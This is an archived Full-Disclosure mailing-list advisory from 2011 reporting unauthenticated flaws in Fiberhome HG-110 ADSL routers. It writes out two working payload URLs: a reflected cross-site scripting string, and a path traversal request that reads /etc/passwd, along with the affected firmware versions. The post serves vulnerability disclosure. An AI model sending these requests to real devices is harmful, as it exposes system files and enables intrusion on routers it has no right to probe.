lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <4D9F0DFC.9070903@zerial.org> Date: Fri, 08 Apr 2011 10:30:36 -0300 From: "Zerial." <fernando@...ial.org> To: full-disclosure@...ts.grok.org.uk Subject: Fiberhome HG-110 (adsl/router) vulnerabilities -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I found two vulnerabilities on fiberhome hg-110 routers[1] and has not been reported nor fixed. XSS: - - http://192.168.1.1:8000/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns Local File Include and Directory/Path Traversal: - - http://192.168.1.1:8000/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns URLs are accessible without authentication. Device info: - - HardwareVersion : HG110_BH_R1A - - SoftwareVersion : HG110_BH_V1.6 - - Firmware Version : 1.0.0 This vulnerabilities can affect to other version and models of this vendor. [1] http://www.minuevohogar.cl/wp-content/uploads/2011/03/Imagen-8.png - -- Zerial Seguridad Informatica GNU/Linux User #382319 Blog: http://blog.zerial.org Jabber: zerial@...beres.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAk2fDfwACgkQIP17Kywx9JSPbwCfXNQs42kMMPcUiw5107MnABJ0 PcUAniDsC0MZplJNquS0mXCtpidLk32r =UZbN -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists